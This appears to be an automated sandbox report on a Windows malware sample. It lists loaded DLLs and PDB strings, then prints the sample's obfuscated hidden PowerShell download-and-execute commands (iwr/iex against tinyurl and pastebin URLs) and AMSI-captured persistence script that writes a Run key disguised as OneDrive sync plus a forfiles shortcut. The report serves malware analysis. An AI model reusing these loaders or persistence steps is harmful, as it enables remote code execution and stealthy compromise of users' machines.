Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
Source: C:\Windows\System32\attrib.exe | Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe | Section loaded: fsutilext.dll
Source: C:\Windows\System32\forfiles.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: C:\Users\user\Desktop\vF20HtY4a4.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32
Source: BeginSync.lnk.3.dr | LNK file: ..\..\..\Windows\System32\forfiles.exe
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\vF20HtY4a4.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: vF20HtY4a4.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: vF20HtY4a4.exe | Static PE information: Image base 0x140000000 > 0x60000000
Source: vF20HtY4a4.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: vF20HtY4a4.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbAC source: powershell.exe, 00000009.00000002.2015256142.000001FD29726000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbll source: powershell.exe, 00000009.00000002.2014277292.000001FD294F4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2118591643.00000210EA688000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbd source: powershell.exe, 0000000E.00000002.2121010595.00000210EA9ED000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbr source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Administrator.ADMINISTRATOR\Downloads\Origami-master\Origami-master\src\obj\x64\Release\net472\Origami.pdb source: vF20HtY4a4.exe
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbI source: powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb6 source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbW source: powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb( source: powershell.exe, 0000000E.00000002.2121010595.00000210EA9ED000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbdatetime source: powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb#D source: powershell.exe, 00000009.00000002.2015256142.000001FD29726000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2015256142.000001FD297DA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2121010595.00000210EA9ED000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2117616989.00000210EA5FE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscoree.dllKC:/Users/GLaDOS/The/Cake/Is/A/Lie.pdb source: vF20HtY4a4.exe
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbe089R source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000000E.00000002.2121010595.00000210EA9ED000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbQ source: powershell.exe, 0000000E.00000002.2119928343.00000210EA911000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32\Win Jh source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdba source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Administrator.ADMINISTRATOR\Downloads\Origami-master\Origami-master\src\obj\x64\Release\net472\Origami.pdbSHA256 source: vF20HtY4a4.exe
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb( source: powershell.exe, 0000000E.00000002.2121010595.00000210EA9ED000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2015256142.000001FD2975F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbm source: powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.2120072204.00000210EA9B2000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\vF20HtY4a4.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing)
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: vF20HtY4a4.exe | Static PE information: 0xDE7ACC38 [Mon Apr 12 06:27:04 2088 UTC]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFB4AE2E1CA push edx; iretd 9_2_00007FFB4AE2E1CB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFB4AE32558 push E8FFFFFFh; iretd 9_2_00007FFB4AE3255D

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk"if (-Not (Test-Path $googoogaagaa)) {$currentPath = [System.Environment]::GetEnvironmentVariable("PATH", "User")$newPath = $currentPath + ";$env:tmp"[System.Environment]::SetEnvironmentVariable("PATH", $newPath, "User")#New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Driver Diagnosis" -Value "regsvr32.exe /s DriverDiag" -PropertyType String -ForceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Force#$source = "https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/DriverDiag.dll"#$destination = "$env:tmp\DriverDiag.dll"#Invoke-WebRequest -Uri $source -OutFile $destinationmkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,
0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0